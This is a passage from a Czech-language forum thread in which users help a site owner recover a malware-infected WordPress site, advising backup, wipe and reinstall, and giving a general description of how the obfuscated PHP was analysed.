Nejde o IQ, útočníci mají týdny, měsíce na přípravu těhle "virů", ty máš hodiny, dny se tím vypořádat, není to snadné ani pro zkušené lidi.

Tady pro tebe je asi nejlepší řešení to prostě celé zálohovat, shodit a nahrát znovu. Čistění je velice těžké. Rád byh ti pomohl, ale nemám teď na to čas a nechtěl bych to udělat zdarma. Pokud jsi schopný sem napsat konkrétní problémy, budu se snažit ti odpovědět veřejně.
08.12.2022 19:06
26
Vše jsem stáhl, smázl, nahrál zpět web - funguje, nahraju další a uvidíme...BTW jak si ten kod rozlouskl?
09.12.2022 07:25
27
Je to pořád php kód, textové hodnoty jsou často zakódovaný jako \x##, proměnné jako název používají různé kombinace nul a písmen O. Názvy php funkcí se skládají se stringů postupně. Není to šifrované a ani jinak schované.

Šel jsem na to přes php fmt, převedl na AST, ručně jsem přeházel nějaké bloky, vypreparoval jsem z toho některé url a podíval se co je na nich. Neprocházel jsem to celé.

Zálohuj a dej si na to pozor, aktualizuj WP pravidelně. Není ještě jasné, jak tam pronikli, může to nastat znovu, podle informací k tomu kódu na internetu, tak je to skupina, která skenuje WP a využívá zranitelnosti, tak se tam teda nejspíš dostali.
09.12.2022 17:07
28
To TomášX a ostatním děkuji za rady, no snad to bude dobrý...uvidíme zda se to tam zase neobjeví...